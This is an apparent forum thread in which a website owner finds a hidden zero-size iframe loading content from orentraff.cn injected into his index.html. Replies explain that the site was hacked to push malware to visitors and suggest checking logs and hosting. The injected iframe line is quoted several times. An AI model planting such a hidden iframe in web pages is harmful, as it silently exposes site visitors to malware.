index issue

[ThL]

Hi everyone,
I recently had some problem accessing the main page of my website : it
displayed a blank page instead of my usual welcome message.
I found out that the culprit was the "index.html" file. Here's what its
code showed :
<!-- ~ --><iframe src="http://orentraff.cn/in.cgi?3" width="0"
height="0" style="display:none"></iframe><!-- ~ -->

I created my site four years ago and never altered it since. After such
a long time I therefore don't remember writing this code, especially the
"orentraff.cn" bit.

After many attempts to understand why a blank page appeared I finally
gave up : I erased the file and replaced it with a new one. It now works
OK. Yet the problem could arise again at any time.

1 - Does anyone know what the code mentioned above (in particular
orentraff.cn) means ?
2 - Does anyone know what happened to my index file ? Did it get
corrupted or was my site hacked ?

Many thanks in advance for your kind replies and help.
Thierry

 

[Steve Pugh]

Hi everyone,
I recently had some problem accessing the main page of my website : it
displayed a blank page instead of my usual welcome message.
I found out that the culprit was the "index.html" file. Here's what its
code showed :
<!-- ~ --><iframe src="http://orentraff.cn/in.cgi?3" width="0"
height="0" style="display:none"></iframe><!-- ~ -->

I created my site four years ago and never altered it since. After such
a long time I therefore don't remember writing this code, especially the
"orentraff.cn" bit.

After many attempts to understand why a blank page appeared I finally
gave up : I erased the file and replaced it with a new one. It now works
OK. Yet the problem could arise again at any time.

1 - Does anyone know what the code mentioned above (in particular
orentraff.cn) means ?

orentraff.cn is a domain name. The code was calling something from
another server into an invisible iframe. That something is probably
malicious.

2 - Does anyone know what happened to my index file ? Did it get
corrupted or was my site hacked ?

You were hacked.

Steve

 

[ThL]

Steve Pugh a écrit :

orentraff.cn is a domain name. The code was calling something from
another server into an invisible iframe. That something is probably
malicious.


You were hacked.

Steve

Oops...
Thanks for your quick reply Steve.

Next step :
Now what ?


Thierry

 

[Jonathan N. Little]

Steve Pugh a écrit :

Oops...
Thanks for your quick reply Steve.

Next step :
Now what ?

Remove the line of code.

Contact hosting company and find out how someone else could have gotten
write access to your account.

 

[ThL]

Jonathan N. Little a écrit :
Hi Johnathan,
Thanks for your reply.

Remove the line of code.

I erased the file and replaced it with a new index.html one.

Contact hosting company and find out how someone else could have gotten
write access to your account.

I first contacted my ISP, who host my site and asked them what the
matter was.
Unfortunately they were unable to give me any further info, apart from
the fact that the "ghost" site was registered in China.
I suppose the question of knowing "how someone got my write access" must
have come to their minds, though they didn't mention it to me.
Maybe they think I was not careful enough with my private passwords,
which could be the case. One never knows.
I'll ask them the question.

Another question just popped : Are these hacking situations common ? If
so, what do they use the hacked sites for ? Storing and exchanging
illegal data ?

Thierry

 

[Harlan Messinger]

Hi everyone,
I recently had some problem accessing the main page of my website : it
displayed a blank page instead of my usual welcome message.
I found out that the culprit was the "index.html" file. Here's what its
code showed :
<!-- ~ --><iframe src="http://orentraff.cn/in.cgi?3" width="0"
height="0" style="display:none"></iframe><!-- ~ -->

I created my site four years ago and never altered it since. After such
a long time I therefore don't remember writing this code, especially the
"orentraff.cn" bit.

After many attempts to understand why a blank page appeared I finally
gave up : I erased the file and replaced it with a new one. It now works
OK. Yet the problem could arise again at any time.

1 - Does anyone know what the code mentioned above (in particular
orentraff.cn) means ?

It means your page consisted of an invisible iframe of zero width and
zero height set up to display the page at the address shown. I'm
guessing, since the page was conspicuously set up not to be seen within
yours, that it's meant to do nastry things to the computer of anyone who
visits your page.

2 - Does anyone know what happened to my index file ? Did it get
corrupted or was my site hacked ?

Yes, someone in China hacked into your website.

 

[Jonathan N. Little]

Jonathan N. Little a écrit :

Hi Johnathan,
Thanks for your reply.

I erased the file and replaced it with a new index.html one.
I first contacted my ISP, who host my site and asked them what the
matter was.
Unfortunately they were unable to give me any further info, apart from
the fact that the "ghost" site was registered in China.
I suppose the question of knowing "how someone got my write access" must
have come to their minds, though they didn't mention it to me.
Maybe they think I was not careful enough with my private passwords,
which could be the case. One never knows.
I'll ask them the question.

If this a ISP's webspace that came with internet connection account, we
sometimes the little "Mom & Pop" ISPs are real amateurs with respect to
hosting. Only time I had a hacked site was with an ISP personal
webspace. They did not restrict access for their FTP account to users
home folder (very basic security) and I even told them that once I FTPed
in I could wander all over the server... This was back in the 90's. Get
real hosting and this should not be a problem.

Another question just popped : Are these hacking situations common ? If
so, what do they use the hacked sites for ? Storing and exchanging
illegal data ?

Using your site to plant malware on unsecured browsers and gullible
visitors.

If these people who host your site don't know how your site was hacked
(and you did not tell anyone else your FTP password) I'd find a better
place to host your site. BTW, if you have not editied your page yet,
look at the modification date to give you some idea when it was hacked...

 

[ThL]

Harlan Messinger a écrit :

It means your page consisted of an invisible iframe of zero width and
zero height set up to display the page at the address shown. I'm
guessing, since the page was conspicuously set up not to be seen within
yours, that it's meant to do nastry things to the computer of anyone who
visits your page.

Thanks for your reply.

Would you know how ?

Thierry

 

[Harlan Messinger]

Harlan Messinger a écrit :

Hi everyone,
I recently had some problem accessing the main page of my website :
it displayed a blank page instead of my usual welcome message.

[snip]
It means your page consisted of an invisible iframe of zero width and
zero height set up to display the page at the address shown. I'm
guessing, since the page was conspicuously set up not to be seen
within yours, that it's meant to do nastry things to the computer of
anyone who visits your page.

Thanks for your reply.

Would you know how ?

No. But clearly you have a security leak somewhere.

 

[Jonathan N. Little]

Harlan Messinger a écrit :

ThL wrote:
Hi everyone,
I recently had some problem accessing the main page of my website :
it displayed a blank page instead of my usual welcome message. [snip]
It means your page consisted of an invisible iframe of zero width and
zero height set up to display the page at the address shown. I'm
guessing, since the page was conspicuously set up not to be seen
within yours, that it's meant to do nastry things to the computer of
anyone who visits your page.

Thanks for your reply.

Would you know how ?

No. But clearly you have a security leak somewhere.

As I said elsewhere in the thread, before to fix the page check the
modification date, that can help you determine when the hack occurred.
If it was not too long ago your ISP should have the FTP session logged.
I would start there...

 

[ThL]

Jonathan N. Little a écrit :

Harlan Messinger a écrit :
ThL wrote:
Hi everyone,
I recently had some problem accessing the main page of my website :
it displayed a blank page instead of my usual welcome message. [snip]
It means your page consisted of an invisible iframe of zero width
and zero height set up to display the page at the address shown. I'm
guessing, since the page was conspicuously set up not to be seen
within yours, that it's meant to do nastry things to the computer of
anyone who visits your page.

Thanks for your reply.

Would you know how ?

No. But clearly you have a security leak somewhere.

As I said elsewhere in the thread, before to fix the page check the
modification date, that can help you determine when the hack occurred.
If it was not too long ago your ISP should have the FTP session logged.
I would start there...

OK then I'll contact them and ask the question.

All this is very worrying.

Thanks a lot for your help, Johnathan, Harlan and Steve !

Thierry

 

[T Lariviere]

Jonathan N. Little a écrit :

If this a ISP's webspace that came with internet connection account, we
sometimes the little "Mom & Pop" ISPs are real amateurs with respect to
hosting. Only time I had a hacked site was with an ISP personal
webspace. They did not restrict access for their FTP account to users
home folder (very basic security) and I even told them that once I FTPed
in I could wander all over the server... This was back in the 90's. Get
real hosting and this should not be a problem.


Using your site to plant malware on unsecured browsers and gullible
visitors.

If these people who host your site don't know how your site was hacked
(and you did not tell anyone else your FTP password) I'd find a better
place to host your site. BTW, if you have not editied your page yet,
look at the modification date to give you some idea when it was hacked...

Good to know.
Thanks.
Thierry